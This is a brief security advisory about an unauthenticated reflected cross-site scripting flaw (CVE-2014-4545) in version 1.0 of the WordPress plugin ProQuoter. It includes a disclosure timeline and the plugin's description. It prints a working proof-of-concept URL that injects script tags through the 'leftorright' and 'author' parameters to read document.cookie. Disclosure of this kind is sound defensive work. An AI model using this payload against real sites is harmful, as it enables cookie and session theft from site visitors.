wp-plugin : proquoter – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : proquoter

 

Effected Version : 1.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhot/wordpress/wp-content/wp-plugs/proquoter/pq_dialog.php?leftorright=leftorright%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&author=author%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-22

 
Plugin Status : Closed on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4545

 
Plugin Description :
 
ProQuoter allows you to easily create beautiful pull-quote images for your articles. Pull-quotes have an amazing ability to draw the reader's attention. They can turn a dull piece of text into an incredible visually stimulating article. If you don't have any exciting images to spice up your article then they can be even more important. Now it's easy to create incredibly beautiful pull quotes in your blog entry.

Just highlight the text you want to use and click one of the ProQuoter toolbar buttons and you will be able to select from 1000s of styles for your pull-quote. It only takes a few seconds to add beautiful quote images to your blog post and increase your traffic from Pinterest.

Images are genereated and hosted by our website http://quotes.prowritingaid.com but you are free to download them and host them yourself if you so wish. On our website you will find over 100,000 pre-made, beautiful quote images to choose from including: funny quotes, inspirational quotes, motivational quotes, love quotes and more.

Leave a Reply

Your email address will not be published. Required fields are marked *